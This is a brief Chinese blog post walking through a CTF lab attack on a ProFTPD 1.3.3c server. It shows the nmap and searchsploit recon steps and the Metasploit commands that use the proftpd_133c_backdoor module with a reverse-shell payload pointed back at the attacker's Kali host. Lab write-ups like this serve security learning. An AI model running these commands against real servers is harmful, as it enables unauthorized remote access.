【CTF】FTP服务漏洞

kali:192.168.223.131
target:192.168.223.169

通过arp-scan -l扫描到目标IP为192.168.223.169先扫描一下目标

nmap -T4 -A -v 192.168.223.169

image

发现开启21号ftp端口,用的是ProFTPD 1.3.3c,22、80端口;可以搜索一下ProFTPD的0day,在此之前,先访问一下目标网站,发现没什么东西

image

搜索ProFTPD 1.3.3c的漏洞

searchsploit ProFTPD 1.3.3c

image

通过结果可以使用远程代码执行漏洞,或者在msf中也可以寻找

msfconsole
search  ProFTPD 1.3.3c

image

搜索到漏洞,直接利用

use exploit/unix/ftp/proftpd_133c_backdoor
set rhost 192.168.223.169
set payload cmd/unix/reverse
set lhost 192.168.223.131
exploit

直接拿到服务器权限

image

posted @ 2022-04-09 20:37  icui4cu  阅读(272)  评论(0)    收藏  举报